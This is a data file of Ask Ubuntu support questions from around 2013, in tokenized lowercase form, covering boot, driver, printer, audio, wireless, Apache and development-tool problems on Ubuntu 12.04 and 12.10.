258769	gksu not working in menu mode but works in cli mode	i 'm running 12.04 , latest updates . when i use gksu in the menu to start a application the prompt for password does n't appear and the application starts with user priviledges . if i use gksu from commmand line everything works just fine . i need to create a shortcut : any idea ?
258770	`` error while loading shared libraries : libjpeg.so.9 : can not open shared object file : no such file or directory ''	i just built libjpeg and installed it . i 'm trying to my program , it successfully builds , but shows this message when executed : error while loading shared libraries : libjpeg.so.9 : can not open shared object file : no such file or directory locate -i libjpeg shows this : /usr/lib/gthumb/extensions/libjpeg_utils.so /usr/lib/i386-linux-gnu/libjpeg.so.8 /usr/lib/i386-linux-gnu/libjpeg.so.8.0.2 /usr/share/doc/libjpeg-progs /usr/share/doc/libjpeg-turbo-progs /usr/share/doc/libjpeg-turbo8 /usr/share/doc/libjpeg8 /usr/share/doc/libjpeg-progs/changelog.debian.gz /usr/share/doc/libjpeg-progs/copyright /usr/share/doc/libjpeg-turbo-progs/changelog.debian.gz /usr/share/doc/libjpeg-turbo-progs/copyright /usr/share/doc/libjpeg-turbo8/changelog.debian.gz /usr/share/doc/libjpeg-turbo8/copyright /usr/share/doc/libjpeg8/changelog.debian.gz /usr/share/doc/libjpeg8/copyright /usr/share/lintian/overrides/libjpeg-turbo8 /var/lib/dpkg/info/libjpeg-progs.list /var/lib/dpkg/info/libjpeg-progs.md5sums /var/lib/dpkg/info/libjpeg-turbo-progs.list /var/lib/dpkg/info/libjpeg-turbo-progs.md5sums /var/lib/dpkg/info/libjpeg-turbo8 : i386.list /var/lib/dpkg/info/libjpeg-turbo8 : i386.md5sums /var/lib/dpkg/info/libjpeg-turbo8 : i386.postinst /var/lib/dpkg/info/libjpeg-turbo8 : i386.postrm /var/lib/dpkg/info/libjpeg-turbo8 : i386.shlibs /var/lib/dpkg/info/libjpeg-turbo8 : i386.symbols /var/lib/dpkg/info/libjpeg8 : i386.list /var/lib/dpkg/info/libjpeg8 : i386.md5sums by the way , i 'm using sublime text 2 with the following build system : { `` cmd '' : [ `` g++ '' , `` $ file '' , `` -o '' , `` $ file_base_name '' , `` -i/usr/local/include '' , `` -l/usr/local/lib '' , `` -ljpeg '' ] , `` working_dir '' : `` $ { file_path } '' , `` selector '' : `` source.c++ '' , `` windows '' : { `` cmd '' : [ `` cl '' , `` /fo $ { file_path } '' , `` /o2 '' , `` $ file '' ] } } i saw this link but it was n't helpful : error trying to run gccg while loading shared libraries : libjpeg.so.62 : can not open shared object file can someone please help ?
258772	can i write apps for ubuntu phones and tablets with mono ?	i just wanted to ask if it will be possible to write apps with c # and .net via mono for ubuntu tablet and phone . i could not find anything about this matter . since i heard that the version for tablets would just work as the desktop one i would guess the answer would be `` yes you could write apps with c # '' can someone confirm whether this is true or not ?
258775	can not boot ubuntu 12.04 from ssd	i can not boot from my ssd with a fresh in stall of 12.04 lts . i tried to boot from the flash drive and copy the grub file to the proper location on the ssd and reboot.. no luck . there is another post out there that recommended running grub-install on the ssd once it has booted - some of the users in this thread could boot with the usb install disk . since i can not boot from the ssd , i can not run grub-install . is there any ways around this ?
258778	eclipse closes automatically	eclipse in my ubuntu 12.10 closes automatically . it happened a lots of time . when i executed eclipse from terminal , it gave me following messages . slf4j : failed to load class `` org.slf4j.impl.staticloggerbinder '' . slf4j : defaulting to no-operation ( nop ) logger implementation slf4j : see http : //www.slf4j.org/codes.html # staticloggerbinder for further details . [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize refresh ! ! [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize refresh ! ! [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize [ debug ] execute contextualize i 've no idea what is causing this problem . what is org.slf4j.impl.staticloggerbinder and how to load it ? also if any plugins installed is causing problem , i 've installed following plugins . windowsbuilder pro spring ide egit m2eclipse dbviewer dali java persistence tools i ca n't attach whole .log file in this question , so i 've put it in gist.github.com update recently , i was having automatic closing of eclipse and i got some hint that eclipse closes automatically when i switch to different workspaces but not always . any idea , why this could n't happening ?
258780	how to add mime type for the apache webserver ?	in ubuntu , i am running simple html page that can run mp4 video , i have configured apache server and have run simple test page for hello world , its working fine . in apache webserver i have read that we need to add the following code to httpd.conf file or to an .htaccess file in the directory where our video files are . addtype video/ogg .ogv addtype video/mp4 .mp4 addtype video/webm .webm so my question is where is this httpd.conf or .htaccess file available , do i manually need to create these files or they are stored somewhere . the code of my html page is like this : < video width= '' 320 '' height= '' 240 '' controls > < source src= '' test.mp4 '' type= '' video/mp4 '' > < source src= '' test.ogg '' type= '' video/ogg '' > < /video > please give me the suggestions . ankit
258782	software center does n't start after installing an application	translated using google translate : i have a problem on my pc . after installation of an application , the software center crashes . when i run it in a terminal , the following messages posters : andriajozy @ andrejose : ~ $ software-center warning : gnome-keyring : : could n't connect to : /tmp/keyring-xh50mg/pkcs11 : aucun fichier ou dossier de ce type 2013-02-20 17:34:03,973 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-02-20 17:34:03,973 - root - error - could not find any typelib for gst 2013-02-20 17:34:04,053 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-02-20 17:34:04,059 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-02-20 17:34:04,144 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.geoclue.master was not provided by any .service files' 2013-02-20 17:34:04,610 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-02-20 17:34:04,846 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . what can i do in order to remedy this ? i uninstalled the application recently added in vain . i tried also to remove and reinstall software-center but it does not solve the problem . can someone help me ? thank you for your help . running ubuntu 12.04 amd64 i
258786	where is the subversion executable located	i 've installed subversion via the command line . but i need to find the executable to point to it in my ide . do you know where it is located in the ubuntu file system ?
258789	canon mp280 scanner not recognised in 12.04 after updates	i have had my canon mp280 scanner working but since various updates it is no longer recognised despite following all the `` answers '' on this site and others . it does not work at all with simple scan , scangearmp or gimp . nothing recognises it . the printer part still works .
258798	installing kernel 3.8 on 12.10 , 12.04	he there , the release notes for kernel 3.8 do mention improved performance for ext4 using small files . that alone sounds interesting ; now i am wondering : will there be a simple ppa approach at some point that allows to use 3.8 kernels on 12.10 ( and/or maybe 12.04 ) ? in the sense of : i just add the ppa once ; and then like with `` normal '' kernels i dont need to worry about any updates , they just come along without any further activity on my side ? or does using upstream kernels imply that i have to fetch out myself any time a new 3.8 versions comes around the corner ?
258800	unable to find boot screen to install ubuntu , with windows 8 installed	i am trying to install ubuntu , with windows 8 installed on my system . but i am unable to get the grub boot screen to select the operating system , as it is uefi secure boot protected . can anyone help me on this one ? i am looking for installing ubuntu alongside windows 8 ( dual-boot . ) any help appreciated .
258802	wireless network adapter not detected on start	i have to turn the wireless network switch off and on again every time ubuntu starts up in order to recognize the wireless adapter . the laptop model is ibm thinkpad r60 series . i installed ubuntu 12.10 and all working fine except for the problem i mentioned above . the wireless chipset obtained from the command lspci is : atheros communications inc. ar5212 802.11abg nic ( rev 01 ) can anyone help on this ?
258804	what does 'locale not supported by c ' mean ?	marco @ marco-laptop : ~ $ onboard ( python:3065 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . i am using keyboard on the desktop ( long story ) from the terminal and usually nothing happens , only the keyboard appears , but after the application `` computer janitor '' started ( and i erased something ) i see this notice . what does it mean ?
258805	how do i update an intel motherboard bios using ubuntu without a keyboard ?	i 'm using ubuntu 12.10 on intel nuc , and have no keyboard only a mouse attached .
258808	uefi dual-boot , how to load recovery partition ( windows 8 ) after installing ubuntu	i 've installed ubuntu ( ~efi mode ) in a asus zenbook ux32vd , which has windows 8 pre-installed . it had security boot disabled . i installed grub in the same partition i put the root directory ( sda7 in my case ) . after installation ubuntu loaded and worked , great . but there were 2 other partitions in grub that did n't run : windows recovery enviroment ( loaer ) ( on /dev/sda2 ) windows 8 ( loader ) ( on /dev/sda4 ) whenever i try to load any of the above i got : error : ca n't find command < < drivemap > > . error : invalid efi file path . i found in internet multiple people having similar issues : https : //bugs.launchpad.net/ubuntu/+source/grub2/+bug/1024383 i tried using boot-repair ( recommended repair ) utility from ubuntu , and i 've got 2 new entries in grub called : windows uefi bootmgfw.efi windows boot uefi loader they load windows 8 , but the recovery partition is missing . i 've tried using boot-repair more times with different parameters which could make the bootmgfw.efi fail but none added a recovery partition entry : http : //paste.ubuntu.com/1690668/ ( this is the last one boot repair i did . edit : this boot-repair was using recommended repair ) i 'd like to know how can i add an entry to grub that loads the recovery one . any help to make my recovery partition to load would be greatly appreciated .
258810	is there a graphical git commit application to show diffs and set a commit message ?	as part of my work i regularly commit to git . i have a fabric script that does an interactive commit : git commit -a which shows me which files have changed in nano and then lets me write a commit message . the problem with this flow is sometimes i need to know what changes i 've made inside a file . i was doing a ton of stuff at 3am this morning and i ca n't for the life of me remember what i was doing . i have to manually git diff to see the changes . is there a graphical application that can help me out here ? it still needs to be scripted from fabric but in a perfect world it would be a textbox , a list of changed files and a meld-like window showing diffs based on the file i selected . does such a glorious thing exist ?
258813	can not create wireless ap	i 've tried to create ap using this and tried to solve my problem $ iw list nl80211 not found . with this , but i still get error when i start make ~/hostapd-2.0/hostapd $ make ../src/drivers/driver_nl80211.c:19:31 : fatal error : netlink/genl/genl.h : no such file or directory compilation terminated . make : *** [ ../src/drivers/driver_nl80211.o ] error 1 any ideas ? i have a broadcom wireless card .
258820	no analog audio output , only digital output available	i just installed ubuntu 12.10 on a new intense pc , which uses a single 3.5mm audio jack for both digital ( s/pdif ) and analog output . i 'm trying to get the analog output working , but in the ubuntu sound preferences , the only option available ( under `` play sound through '' ) is `` digital output ( s/pdif ) , built-in audio '' and no sound comes through the analog speakers i have plugged into the output jack . i 'm not sure what to do to get analog output to show up in the list of output device choices . any ideas ? some potentially relevant hardware information : $ lspci | grep -i audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) $ aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc888 analog [ alc888 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc888 digital [ alc888 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 thanks !
258823	what 's the benefit of autofs versus a static nfs mount ?	i understand that autofs mounts shared on-demand and then unmounts them after a certain amount of idle time , but are there other advantages to autofs ? for example , if my nfs server crashes ( or reboots ) , a traditional static nfs mount seems to cause problems and hang the machine , etc . i 've also noticed that static nfs mounts sometimes are n't available before my htpc applications ( i.e . xbmc ) are started . would autofs help in either of the above situations ?
258825	ubuntu does n't recognize me having more than 1 os	i 'm trying to install ubuntu 12.04 by following the instruction found in its official documentation on http : //ubuntu.com to install it alongside win7 , but this is what i found is there anything i can do to get install the ubuntu alongside win7 option just like on its websites ? btw , i 'm using hp probook 4331s . thank you
258829	create a gtk window insensitive to show desktop and wo n't show in launcher	i want to make a gtk.window which is pinned to the desktop and acts like a desktop widget . i 've found that i can do this by setting self.set_type_hint ( gdk.windowtypehint.desktop ) which keeps it below all windows , immovable and insensitive to show desktop unity plugin . however , if you click on the desktop area outside of the widget , the window is hidden behind the desktop and i ca n't get it back ( i have to kill the program ) . what is the best way to handle this ? is there another setting ? i 've found that i can also get a window to ignore show desktop commands if i set the skip_taskbar hint and deactivate a setting in compiz , but i 'd rather not muck around with people 's compiz settings to get this effect . edit : figured out the ignore show desktop ( see below ) , but still ca n't get it to skip the launcher bar . the desktop window hint worked for that , but has the drawbacks mentioned above . i also played around with setting the wm_class in the .desktop file , but unity seems to ignore that .
258832	suyin ńamera problem	i got an acer with a suyin camera built-in . it has worked perfect since i have change from windows 8 three weeks ago but recently ( two days ago ) showed me a black screen when using skype or cheese . the camera has been detected by the system testing but gives me anwers like this for the first test : could not load image 'camera_test_25112w.jpg'.error interpreting jpeg image file ( improper call to jpeg library in state 200 ) and the final results : **camera/detect** passed : */dev/video0 : ok name : hd webcam driver : uvcvideo version : 3.5.7 flags : 0x4000001 [ capture streaming ] format : yuyv ( yuv 4:2:2 ( yuyv ) ) resolutions : 640x480,160x120,176x144,320x240,352x288,1280x720,640x480 format : mjpg ( mjpeg ) resolutions : 640x480,160x120,176x144,320x240,352x288,1280x720,640x480* **camera/still** failed **camera/display** failed **optical/detect** passed hl-dt-st dvdram gu61n **optical/read_sr0** failed if you need i also have the lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 04f3:0023 elan microelectronics corp . bus 003 device 003 : id 064e : e330 suyin corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub last of all i ran gstreamer-properties and see what i got : gstreamer-properties-message : skipping unavailable plugin 'artsdsink' gstreamer-properties-message : skipping unavailable plugin 'esdsink' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosink' gstreamer-properties-message : skipping unavailable plugin 'glimagesink' gstreamer-properties-message : skipping unavailable plugin 'sdlvideosink' gstreamer-properties-message : skipping unavailable plugin 'v4lmjpegsrc' gstreamer-properties-message : skipping unavailable plugin 'qcamsrc' gstreamer-properties-message : skipping unavailable plugin 'v4lsrc' gstreamer-properties-message : skipping unavailable plugin 'esdmon' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosrc' gstreamer-properties-message : error running pipeline 'video for linux 2 ( v4l2 ) ' : could not get buffers from device '/dev/video0 ' . [ gstv4l2bufferpool.c ( 405 ) : gst_v4l2_buffer_pool_new ( ) : /gstpipeline : pipeline1/gstv4l2src : v4l2src2 : error requesting 2 buffers : device or resource busy ] gstreamer-properties-message : error running pipeline 'video for linux 2 ( v4l2 ) ' : could not get buffers from device '/dev/video0 ' . [ gstv4l2bufferpool.c ( 405 ) : gst_v4l2_buffer_pool_new ( ) : /gstpipeline : pipeline2/gstv4l2src : v4l2src3 : error requesting 2 buffers : device or resource busy ] if anyone can share their toughts on it . much appreciated ! peace
258835	is it possible to make openstack work with maas without involving juju ?	i have to machines , { machine-a : will be used as my master maas server with openstack } and { machine-b [ quad core/16gb ram/8x hdd ] : will be running a kvm where all my nodes will run on } purpose i want to create 7 nodes on the kvm server by using my maas server . then install openstack on the maas server and then use openstack to create instances of ubuntu 12.04 images on each node . note : there are so many questions on this community threads which are helpful but none seem to be able to explain or phrase the question of how openstack connect to maas nodes . questions how will i be able to use openstack to create linux instance on each node without the help of juju ? ( i do n't seem to understand that part a little in the ubuntu cloud infrastructure with openstack . ) do i really need juju to help openstack connect with my maas nodes ? if so , see next question - after juju bootstrap is created and nodes start up under juju status , does openstack automatically sees the nodes with the help of juju or you have to make some changes in some config files ? should i not use my kvm server as a kvm server and just add it as a node to maas and use openstack to allocate hard disk volume size i want for an instance ? without using kvm . i will really appreciate helpful responses and if possible , kb articles that explain how this can be done .
258838	printing kerning problem	when i print from libreoffice the kerning ( inter-letter spacing ) is awful with letters overlapping and spaces where there should not be any . i have found that if i click properties from the print dialog , then tell it to `` print as '' postscript level 3 , instead of pdf , then this comes out fine . i 've set up the virtual pdf printer in cups and can repeat the problem ( and workaround ) printing to that , which means it 's not to do with the specific driver for my printer . so it could be cups , ghostscript , or possibly libreoffice . does anyone know where i should report this problem and which app is likely to blame ? here 's some screenshots to show the problem ( nb . some printed documents are a lot worse than these examples and quite unreadable , but i ca n't share those docs as they have sensitive info in ) and how it should look
258839	how and where can i get ubuntu for phone and install it on nexus 4 ?	how and where can i get ubuntu for phone and install it on nexus 4 ? today is 21st , i ca n't see any link to the phone images .
258841	using files from windows on ubuntu when using windows installer	i just installed ubuntu using the windows installer . i did so onto my main hard drive . i want to find and use programs that were installed on my windows before i installed ubuntu . how do i do this ? if not , how do i delete ubuntu ? i had a look through the `` devices '' and it only came up with my other partition of my hard drive , drive d : ( which i do n't use ; i use c : , which is what i downloaded ubuntu onto ) and this other 210 mb volume thing with folders saying boot and system volume information . i had a look around in that and could n't find an uninstall function . if you could achieve the first objective which is to use programs from the same hard drive ubuntu was loaded onto ( drive c : ) that would be great . if it 's not possible , why not ? and if so , how do i uninstall ubuntu ?
258842	replacing mint with ubuntu on a dual boot laptop	my laptop currently has : sda1 sda2 - windows 7 sda5 - linux mint sda6 - linux swap sda3 - a data partition i 'm looking to erase the mint installation and put ubuntu down in its place without disrupting my windows or data partitions . i 'm assuming that the way forward is to choose the 'something else ' installation type , but i 'm taking myself round in circles trying to work out the device for the boot loader installation as it 's unclear where to define the root file system . i suspect the answer may be quite obvious but i 'm being a bit dense .
258844	why i ca n't run steam on ubuntu ?	i 've installed it already . but when i run steam it shows : you are missing the following 32-bit libraries , and steam may not run : libgl.so.1 fatal error : failed to load steamui.so my ubuntu version is 10.04 lts .
258848	is there a tool that can add a password to a pdf file ?	i 've found lots of info on decrypting pdf files , but none on encrypting them . what tool can do this for me ? edit : there are two good answers below , but in my specific case the pdf was a scan , not a document that i 'd created .
258854	black screen with sound when starting counter strike source	i 've recently installed steam on 12.04 . whenever i try and run counter strike source , it starts , makes the sounds , but the screen is black . i think it has something to do with my drivers not supporting open gl 3.0 or something . counter strike 1.6 works perfectly , as you would expect , but source plays the sound over a black screen . i 'm using open source gallium drivers ; i do n't want to use fglrx as i 've had issues with it in the past . here 's my system information from steam : ssse3 : supported sse4a : supported sse41 : unsupported sse42 : unsupported network information : network speed : operating system version : ubuntu 12.04.2 lts ( 64 bit ) kernel name : linux kernel version : 3.5.0-23-generic x server vendor : the x.org foundation x server release : 11103000 x window manager : compiz steam runtime version : < runtime enabled > video card : driver : x.org gallium 0.4 on amd rs880 driver version : 2.1 mesa 8.0.4 desktop color depth : 24 bits per pixel monitor refresh rate : 59 hz vendorid : 0x1002 deviceid : 0x9715 number of monitors : 1 number of logical video cards : 1 primary display resolution : 1366 x 768 desktop resolution : 1366 x 768 primary display size : 16.14 '' x 9.06 '' ( 18.50 '' diag ) 41.0cm x 23.0cm ( 47.0cm diag ) primary vram not detected sound card : audio device : realtek alc662 rev1 memory : ram : 2742 mb miscellaneous : ui language : english lang : en_gb.utf-8 microphone : not set total hard disk space available : 20158 mb largest free hard disk block : 6586 mb installed software : recent failure reports : from what i 've read , it seems like my graphics card should be compatible with open gl 3.0 ( though i may be wrong ) it seems that what i would need to do is find out how to get that support without wrecking my system . i 'm using ubuntu 12.04 . any help would be very much appreciated , as i 'm very new to linux in general .
258856	how do i update from my current ubuntu 12.04.1 lts to ubuntu 12.04.2 lts ?	how do i update from my current ubuntu 12.04.1 lts to ubuntu 12.04.2 lts ? currently : release 12.04 ( precise ) 32-bit kernel linux 3.2.0-38-generic-pae gnome 3.4.2 i boot to ubuntu 12.04.1 using lvpm created by wubi .
258862	multitouch screen not detected on asus taichi 21dh71	i just bought this ultrabook `` asus taichi 21 dh71 '' . this has intel 3rd generation i7 processor and 4gb ram with 256 gb ssd . the main feature is that it is a hybrid machine . naming it has dual screens . when the lid is closed it can be used as a tablet and when lid open it can be used as a notebook . this machine can also be used with the two screens on at the same time . i used ubuntu many years ago and loved it . but i never tried any linux later . my questions are does the new version of ubuntu support the multitouch interface ? will it work specifically on this machine ? will ubuntu support gestures on multi touchpad ? update 2/22/2013 i did try the latest 64bit ubuntu ( 12.10 ) from live usb and noticed that it could n't detect the tablet screen . everything else worked seamlessly . do you guys think the tablet screen would be detected if i make a complete installation on to the notebook ? please help guys..
258866	open any file using terminal window	i just want to know some commands so that i can open some files using terminal window . for example : how to open pdf files using terminal ?
258874	how use `` color '' and icc profiles to calibrate screen ?	i just installed ubuntu 12.04 lts in an aspire 5250-bz699 , and i would like to calibrate the screen - but i do n't ' know how to use `` color '' and how to apply the icc profiles . is there a tutorial to do this ?
258876	in wired connection settings save option is getting grayed out	each time i switch to manual configuration , of wired connection in ubuntu 12.10 , the save button gets grayed out . as soon as i start setting it in manually , it gets grayed out.please help ! one more thing , system continuously displays a message at the top-right corner of the screen , saying : wired network- not connected
258881	qt designer icon do n't show on cairo dock with open gl	i 'm using latest version of cairo dock with open gl , and when i open qt creator , i ca n't see icon of qt creator , and also cairo dock do n't fade out when qt 's window is overlaped with dock . how can i solve this .
258882	device not working in 12.10	i have a dell inspiron 1501 running ubuntu 12.10 . when i go to software sources > additional drivers , i try to select the right driver , for the wireless card , and select apply changes , it tries to install the driver but then says that the device is not working . the device is broadcom corporation : bcm4311 802.11a/b/g and the driver is broadcom 802.11 linux sta wireless driver source from bcmwl-kernal-source ( proprietart ) how can i fix this . this shows error
258885	installed wrong os need to install 32 bit	like the title states i installed the 64 bit which was the wrong one to install . how do i go back and install the 32-bit version instead ?
258892	how to upgrade pulseaudio	i got some issues with sound , sometimes it freezes and get out of sync with picture . vlc is giving me error , and there is said that i should update to pulseaudio 3.0 . i 'm running ubuntu 12.10 and pulseaudio is $ pulseaudio -- version pulseaudio 2.1 shall i upgrade ? and if so , how ?
258895	why wo n't ubuntu 12.10 install ?	i 've been trying to install ubuntu 12.10 on my dell optiplex 960 for the past two days to no avail . i started off by burning a dvd and trying to install from the dvd , then i tried installing alongside windows 7 with wubi , and now i 'm at a total loss . i select `` install ubuntu '' and nothing happens . every time it seems like it 's working , then the screen just goes blank with a little line symbol blinking in the upper left corner of the screen . any insight as to what i could be doing wrong would be much appreciated .
258897	why does ubuntu 12.04 recognize only one processor ?	i installed ubuntu 12.04 lts in a machine that has an intel i3 processor . as far as i know , i3 processor is a multicore one and the os should recognize 2 processors , just as windows 7 does . ubuntu is n't recognizing it though . is it a known issue ? have i missed some configuration ? $ cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 37 model name : intel ( r ) core ( tm ) i3 cpu 530 @ 2.93ghz stepping : 2 microcode : 0x9 cpu mhz : 2933.374 cache size : 4096 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc up arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm arat dtherm tpr_shadow vnmi flexpriority ept vpid bogomips : 5866.74 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : [ edit ] the output of $ lscpu is : architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 1 on-line cpu ( s ) list : 0 thread ( s ) per core : 1 core ( s ) per socket : 1 socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 37 stepping : 2 cpu mhz : 2933.196 bogomips : 5866.39 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 256k l3 cache : 4096k numa node0 cpu ( s ) : 0 [ edit2 ] some additional info : $ grep apic /boot/config-3.2.0-29-generic config_x86_x2apic=y config_x86_local_apic=y config_x86_io_apic=y config_pci_ioapic=y config_kvm_apic_architecture=y from /var/log/kern.log : feb 22 08:37:27 mattidst002 kernel : [ 0.000000 ] smp : allowing 1 cpus , 0 hotplug cpus ... feb 22 08:37:27 mattidst002 kernel : [ 0.003953 ] cpu0 : thermal monitoring enabled ( tm1 ) feb 22 08:37:27 mattidst002 kernel : [ 0.003961 ] using mwait in idle threads . feb 22 08:37:27 mattidst002 kernel : [ 0.004000 ] smp alternatives : switching to up code feb 22 08:37:27 mattidst002 kernel : [ 0.010870 ] freeing smp alternatives : 24k freed feb 22 08:37:27 mattidst002 kernel : [ 0.010881 ] acpi : core revision 20110623 feb 22 08:37:27 mattidst002 kernel : [ 0.014752 ] acpi : setting elcr to 0200 ( from cc60 ) feb 22 08:37:27 mattidst002 kernel : [ 0.036996 ] ftrace : allocating 26998 entries in 106 pages feb 22 08:37:27 mattidst002 kernel : [ 0.044302 ] weird , boot cpu ( # 0 ) not listed by the bios . feb 22 08:37:27 mattidst002 kernel : [ 0.044304 ] smp motherboard not detected . feb 22 08:37:27 mattidst002 kernel : [ 0.150902 ] smp disabled feb 22 08:37:27 mattidst002 kernel : [ 0.150904 ] performance events : pebs fmt1+ , westmere events , intel pmu driver . feb 22 08:37:27 mattidst002 kernel : [ 0.150911 ] ... version : 3 feb 22 08:37:27 mattidst002 kernel : [ 0.150912 ] ... bit width : 48 feb 22 08:37:27 mattidst002 kernel : [ 0.150914 ] ... generic registers : 4 feb 22 08:37:27 mattidst002 kernel : [ 0.150915 ] ... value mask : 0000ffffffffffff feb 22 08:37:27 mattidst002 kernel : [ 0.150916 ] ... max period : 000000007fffffff feb 22 08:37:27 mattidst002 kernel : [ 0.150917 ] ... fixed-purpose events : 3 feb 22 08:37:27 mattidst002 kernel : [ 0.150919 ] ... event mask : 000000070000000f feb 22 08:37:27 mattidst002 kernel : [ 0.151032 ] nmi watchdog enabled , takes one hw-pmu counter . feb 22 08:37:27 mattidst002 kernel : [ 0.151050 ] brought up 1 cpus feb 22 08:37:27 mattidst002 kernel : [ 0.151052 ] total of 1 processors activated ( 5866.45 bogomips ) . [ edit3 ] even more info : $ grep smp /boot/config-3.2.0-29-genericconfig_x86_64_smp=y config_use_generic_smp_helpers=y config_smp=y # config_x86_vsmp is not set # config_maxsmp is not set config_pm_sleep_smp=y config_have_text_poke_smp=y config_scsi_sas_host_smp=y config_video_vp27smpx=m motherboard model : asus p7h55-m $ sudo lshw i 'm placing here just the info from last command regarding the motherboard : *-core description : motherboard product : p7h55-m br vendor : asustek computer inc. physical id : 0 version : x.0x serial : ms2222222222222222222222222 slot : to be filled by o.e.m . *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : 0602 date : 05/11/2011 size : 64kib capacity : 8128kib capabilities : isa pci pnp apm upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification seems that my ubuntu installation is missing some modules , is it right ? if yes , how can i install the correct ones ? as this is a workstation setup and it toke a lot of time to setup this machine ( setup development environment , bring up all network location , configure vpns and so on ) , would be great if the solution does not involves things like format and reinstall all =p
258899	random white pixels on screen	i have an ubuntu 12.04 installed with a ati radeon hd 6550d . the problem is , that sometimes , there are random white pixels at the screen , which appears especially on dark areas of the screen . this is really annoying during work , and even more when watching movies ( xbmc frodo is installed on that machine , but the pixels also appears on the desktop ) . i thought , maybe it 's sth with the graphic card driver . so i tried some ati drivers and some other ( weird ) stuff , but the problem still exists . here are some screenshots : and hope , somebody can help me . thx !
258901	warning : documentroot x does not exist when starting apache2	i cloned a rackspace server which had some extra /var/www/ directories in it that i did n't want . i just wanted to delete websites that i do n't need on this server . i thought that was as simple as removing the directories and all files inside each directory . so i removed them all via command-line . i had to reboot the server . during the reboot , apache failed to start because : documentroot [ /var/www/path/to/directory/ ] does not exist in addition , i 've got a [ warn ] namevirtualhost *:80 has no virtualhosts notice . my server is running ubuntu 11.10 . i just wanted to delete directories i was n't using anymore . how do i clear this up ?
258906	same computer , same ubuntu , brother prints from usb key boot , not from ssd boot	this is very strange : i have a printer ( brother dcp-j315w ) usb connected to my desktop . if : i boot on usb key ( fresh 12.10 install , 64bits ) , install brother printing drivers , add new printer ( local , usb ) and ask to print the test page it prints ! but , if : i boot on the internal ssd ( fresh 12.10 install , 64bits ) , install brother printing drivers , add new printer ( local , usb ) and ask to print the test page it hangs on `` printer status : inactive - sending data to printer . '' on both : $ dpkg -l | grep brother ii dcpj315wcupswrappe 1.1.3-1 i386 brother cups inkjet printer definitions ii dcpj315wlpr 1.1.3-1 i386 brother lpr inkjet printer definitions ii printer-driver-ptouch 1.3-4ubuntu1 if printing over the network ( from desktop , remote , wireless , ssd boot ) same error . if printing over the network ( from a laptop , 12.10 , 64bits too ) or android : no problems , it prints just fine . i ca n't believe it ! thanks .
258917	ubuntu 12.10 hp pavilion dm4 wireless not working	i have searched about this problem but none of the solutions have worked so far . i have a hp pavilion dm4 that initially came with windows 7 . i upgraded to windows 8 and then replaced that with ubuntu 12.10 . the wifi worked fine until i installed the software upgrades right after installing the os . there is a hardware switch for wifi and bluetooth and it is on . rfkill list all results 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hp-wifi : wireless lan soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no in the network settings , i only see wired and network proxy , no wireless . i am currently connected to a wired network to resolve this issue . any help would be greatly appreciated . thanks !
